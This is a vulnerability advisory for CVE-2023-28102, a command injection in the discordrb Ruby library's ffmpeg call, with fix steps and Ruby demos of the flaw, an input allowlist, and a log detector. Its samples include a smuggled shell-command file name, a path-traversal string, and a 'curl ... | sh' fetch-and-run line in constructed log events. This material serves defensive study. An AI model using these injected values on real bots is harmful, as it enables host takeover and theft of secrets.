CVE-2023-28102

8.3 HIGH

📋 TL;DR

This vulnerability in discordrb (a Ruby library for the Discord API) is a command injection in lib/discordrb/voice/encoder.rb: Encoder#encode_file interpolates the file name or URL it is given into a shell command string for ffmpeg, so a name containing shell metacharacters (a double quote followed by a semicolon is enough) runs attacker-chosen commands on the host with the bot's privileges. Only applications that let user-controlled input reach that method (typically a file name or URL taken from a Discord message and handed to the voice bot's play_file) are affected.

💻 Affected Systems

Products:
  • discordrb
Versions: All versions before commit 91e13043ffa89227c3fcdc3408f06da237d28c95
Operating Systems: All operating systems running Ruby
Default Config Vulnerable: ⚠️ Yes
Notes: The library offers no safe variant of this path, but exploitation needs the client application to pass user-controlled input to encode_file (directly or via play_file). A bot that only plays files from a fixed set it chooses itself is not exploitable.
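The flaw described above, as an added example (not discordrb's own code): a vulnerable encode_file modelled on the string-built command beside the hardened argv form. To make it runnable without ffmpeg or Discord, the ffmpeg binary is replaced by `echo`, which just prints the arguments it receives, so the extra `INJECTED` line shows the injected command actually executing. The payload, the `echo` stand-in and the `compare_shapes` helper are constructed for this demo.

```ruby
# Stand-in for the ffmpeg binary so the demo runs anywhere: `echo` prints
# whatever arguments it was handed (assumption for this example).
FFMPEG = 'echo'.freeze

# Constructed attacker input: closes the quoted -i argument, runs an extra
# command, then reopens the quotes so the rest of the line still parses.
INJECTION_PAYLOAD = 'song.mp3"; echo INJECTED; echo "'.freeze

# Vulnerable shape (modelled on the pre-fix encode_file): the path is
# interpolated into one string, and IO.popen hands a string containing
# shell metacharacters (the quotes alone are enough) to /bin/sh.
def encode_file_unsafe(file, options = '')
  command = "#{FFMPEG} -loglevel 0 -i \"#{file}\" -ac 2 -ar 48000 " \
            "-f s16le -acodec pcm_s16le #{options} pipe:1"
  IO.popen(command, &:read)
end

# Hardened shape: an argv array is exec'd directly, so no shell ever sees
# the file name and metacharacters in it are just bytes of one argument.
# `options` becomes an array too; a free-form string would reopen the hole.
def encode_file_safe(file, options = [])
  argv = [FFMPEG, '-loglevel', '0', '-i', file, '-ac', '2', '-ar', '48000',
          '-f', 's16le', '-acodec', 'pcm_s16le', *options, 'pipe:1']
  IO.popen(argv, &:read)
end

# Runs both shapes on the payload and returns the output lines of each.
# With the unsafe shape the shell runs three commands and "INJECTED" comes
# out on its own line; with the safe shape `echo` prints one line in which
# the payload is still a single, literal argument.
def compare_shapes(payload = INJECTION_PAYLOAD)
  {
    unsafe: encode_file_unsafe(payload).lines.map(&:chomp),
    safe:   encode_file_safe(payload).lines.map(&:chomp)
  }
end

if __FILE__ == $PROGRAM_NAME
  result = compare_shapes
  puts "unsafe (#{result[:unsafe].size} lines):", result[:unsafe]
  puts "safe   (#{result[:safe].size} lines):",   result[:safe]
end
```

The argv form is what makes the fix hold: the patched library likewise passes ffmpeg an argument list instead of a shell string, and the same property applies to any caller-supplied ffmpeg options, which must not be concatenated into a string either.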

📦 What is this software?

discordrb is a Ruby implementation of the Discord API used to write Discord bots. Its voice support shells out to ffmpeg to transcode audio files and URLs into the raw PCM stream that is sent to a voice channel; the vulnerable code is that ffmpeg invocation.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the host system with the privileges of the discordrb process, potentially leading to data theft, ransomware deployment, or complete system takeover.

🟠

Likely Case

Arbitrary command execution as the account running the bot: reading the bot token and any other secrets that account can access, tampering with the bot, and using the host as a foothold for lateral movement within the environment.

🟢

If Mitigated

No impact if file names or URLs reaching the encoder are never user-controlled, or if user input is restricted to an allowlist of known files before it is passed to discordrb.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires the client application to pass unsanitized user input to the vulnerable method; the attacker then needs only a Discord account that can issue the bot command carrying the file name, not any access to the host. No public exploit code has been released.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 91e13043ffa89227c3fcdc3408f06da237d28c95

Vendor Advisory: https://securitylab.github.com/advisories/GHSL-2022-094_discordrb/

Restart Required: Yes

Instructions:

1. Update discordrb to a build that includes commit 91e13043ffa89227c3fcdc3408f06da237d28c95 (no gem release containing the fix was available at the time of the advisory): pin the gem in your Gemfile to the discordrb git repository at that ref and run bundle update discordrb.
2. If you cannot change the dependency, replace the installed lib/discordrb/voice/encoder.rb with the patched file from that commit, and confirm that encode_file now passes ffmpeg an argument list rather than interpolating the file name into a shell string.
3. Restart the bot process so the new code is loaded.

🔧 Temporary Workarounds

Input Validation/Sanitization

Platforms: all

Validate any file name or URL a user can supply before it reaches discordrb's voice encoder: accept only names from a fixed allowlist or a conservative character set (letters, digits, underscore, hyphen, one extension), and reject anything else rather than trying to escape it.

Avoid User Input in Vulnerable Method

Platforms: all

Ensure encode_file (and the play_file path that calls it) is never reached with user-controlled input; have the bot choose from files it owns.

🧯 If You Can't Patch

  • Implement strict input validation and sanitization for all user inputs passed to discordrb.
  • Run the discordrb process with minimal privileges (non-root, restricted user account).
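Caller-side validation of the kind the workarounds above call for, as an added example (not code from discordrb or from any bot): a user-supplied name is mapped to a path under a fixed media directory, and anything outside a conservative allowlist is rejected outright rather than escaped. The media directory, extension list and function names are assumptions for this example; the resulting path is what a bot would hand to discordrb's VoiceBot#play_file.

```ruby
require 'pathname'

# Assumptions for this example: where the bot keeps its audio files and
# which extensions it is willing to play.
MEDIA_DIR   = Pathname.new('/srv/bot/media').freeze
ALLOWED_EXT = %w[.mp3 .ogg .wav].freeze

# Conservative shape for a user-chosen name: one run of letters, digits,
# underscore or hyphen, then one extension. No quotes, spaces, slashes,
# colons or other shell metacharacters can get through, and ".." cannot
# appear because dots are only allowed before the extension.
SAFE_NAME = /\A[A-Za-z0-9_\-]+\.[a-z0-9]+\z/

class UnsafeInput < StandardError; end

# Turns a user-supplied name into a Pathname under MEDIA_DIR or raises.
# Rejecting is deliberate: there is no safe way to "clean" a name for a
# shell-built command, and the allowlist keeps arbitrary URLs out as well.
def resolve_media_path(user_input, base: MEDIA_DIR)
  name = user_input.to_s.strip
  raise UnsafeInput, 'empty name' if name.empty?
  raise UnsafeInput, 'disallowed characters' unless name.match?(SAFE_NAME)
  raise UnsafeInput, 'disallowed extension' unless ALLOWED_EXT.include?(File.extname(name).downcase)

  path = (base + name).cleanpath
  # Belt and braces: even after the regex, insist the result stays under base.
  raise UnsafeInput, 'path escapes media directory' unless path.to_s.start_with?("#{base}/")

  path
end

# Boolean convenience for command handlers that just want yes/no.
def safe_media_name?(user_input)
  resolve_media_path(user_input)
  true
rescue UnsafeInput
  false
end

# In a bot command handler the usage would be:
#   path = resolve_media_path(args.first)   # raises on anything suspicious
#   voice_bot.play_file(path.to_s)          # only ever sees an allowlisted path
if __FILE__ == $PROGRAM_NAME
  ['song.mp3', 'song.mp3"; echo pwned; echo "', '../../etc/passwd',
   'http://203.0.113.5/x.mp3', 'script.sh'].each do |candidate|
    puts "#{candidate.inspect} -> #{safe_media_name?(candidate)}"
  end
end
```

In production also check that the resolved file exists (`path.file?`) and, if the bot is allowed to play URLs at all, handle those through a separate path that fetches the content itself rather than passing the URL string to the encoder.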

🔍 How to Verify

Check if Vulnerable:

Check whether your installed discordrb predates commit 91e13043ffa (the gem version number alone may not tell you, since the fix was a commit rather than a release). Review application code for any path by which user input (message content, command arguments, URLs) reaches Encoder#encode_file in encoder.rb, most often through VoiceBot#play_file.

Check Version:

Check Gemfile.lock or run 'gem list discordrb' to see the installed version and its source; if the gem comes from git, compare the recorded revision with 91e13043ffa in the GitHub commit history.

Verify Fix Applied:

Locate the installed encoder.rb ('gem contents discordrb | grep encoder.rb') and confirm that encode_file builds an argument array for ffmpeg rather than interpolating the file name into a shell string, matching commit 91e13043ffa or later.

📡 Detection & Monitoring

Log Indicators:

  • Unexpected shell command execution from the discordrb process
  • Process spawning with unusual arguments

Network Indicators:

  • Outbound connections from the discordrb process to unexpected destinations

SIEM Query:

Process creation events where the parent is the discordrb bot process and either (a) the child is something other than ffmpeg (or, on unpatched versions, the sh wrapper that the string-built command goes through), or (b) the command line contains shell separators such as ';', '|', '&', backticks or '$(' alongside the ffmpeg invocation.
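The detection logic above run over sample events, as an added example (not a query from any SIEM vendor or from the advisory). The JSON-lines event shape, the `ancestry` field and the sample lines are constructed for this demo; a real deployment would match on the bot's actual command line and user rather than on the process name `ruby`. It distinguishes the unpatched-but-benign case (sh sitting between the bot and ffmpeg) from actual injection (a second command chained onto the ffmpeg line) and from unexpected children.

```ruby
require 'json'

# Constructed sample process-creation events, one JSON object per line.
# Assumed shape: comm, cmdline and an `ancestry` list of ancestor process
# names, innermost first. Not real logs; 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = <<~'LOGS'
  {"ts":"2023-03-10T12:00:01Z","comm":"ffmpeg","cmdline":"ffmpeg -loglevel 0 -i song.mp3 -ac 2 -ar 48000 -f s16le -acodec pcm_s16le pipe:1","ancestry":["ruby"]}
  {"ts":"2023-03-10T12:00:05Z","comm":"sh","cmdline":"sh -c ffmpeg -loglevel 0 -i \"song.mp3\" -ac 2 -ar 48000 -f s16le -acodec pcm_s16le pipe:1","ancestry":["ruby"]}
  {"ts":"2023-03-10T12:00:09Z","comm":"sh","cmdline":"sh -c ffmpeg -loglevel 0 -i \"song.mp3\"; curl http://203.0.113.5/x | sh; echo \"\" -ac 2 -ar 48000 -f s16le -acodec pcm_s16le pipe:1","ancestry":["ruby"]}
  {"ts":"2023-03-10T12:00:09Z","comm":"curl","cmdline":"curl http://203.0.113.5/x","ancestry":["sh","ruby"]}
  {"ts":"2023-03-10T12:01:00Z","comm":"ls","cmdline":"ls -la; echo done","ancestry":["bash"]}
LOGS

BOT_PROCESS       = 'ruby'.freeze          # assumption: the bot runs as `ruby bot.rb`
EXPECTED_CHILDREN = %w[ffmpeg sh].freeze   # sh only appears on unpatched versions
SHELL_META        = /[;|&`]|\$\(/          # separators that chain a second command

def parse_events(text)
  text.each_line.map { |line| JSON.parse(line) }
end

# Only events somewhere below the bot process are of interest.
def bot_lineage?(event)
  event.fetch('ancestry', []).include?(BOT_PROCESS)
end

# :ok               not our process tree, or the direct ffmpeg exec of a patched library
# :shell_wrapper    sh -c around ffmpeg with nothing chained: unpatched code path in use
# :injection        a shell separator on the command line: a second command was smuggled in
# :unexpected_child a binary the bot has no reason to spawn (post-exploitation activity)
def classify(event)
  return :ok unless bot_lineage?(event)

  cmd  = event['cmdline'].to_s
  comm = event['comm']
  return :injection if cmd.match?(SHELL_META)
  return :unexpected_child unless EXPECTED_CHILDREN.include?(comm)
  return(cmd.include?('ffmpeg') ? :shell_wrapper : :unexpected_child) if comm == 'sh'

  :ok
end

# Returns [timestamp, process name, verdict] for every event worth a look.
def scan(text)
  parse_events(text)
    .map { |e| [e['ts'], e['comm'], classify(e)] }
    .reject { |(_, _, verdict)| verdict == :ok }
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_EVENTS).each { |ts, comm, verdict| puts "#{ts}  #{comm.ljust(6)}  #{verdict}" }
end
```

The `:shell_wrapper` verdict is informational: on an unpatched library every legitimate play goes through sh, so its presence confirms the vulnerable code path is live, while `:injection` and `:unexpected_child` are the alerts. Once the patch is applied the bot should exec ffmpeg directly and any sh child becomes worth investigating on its own.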
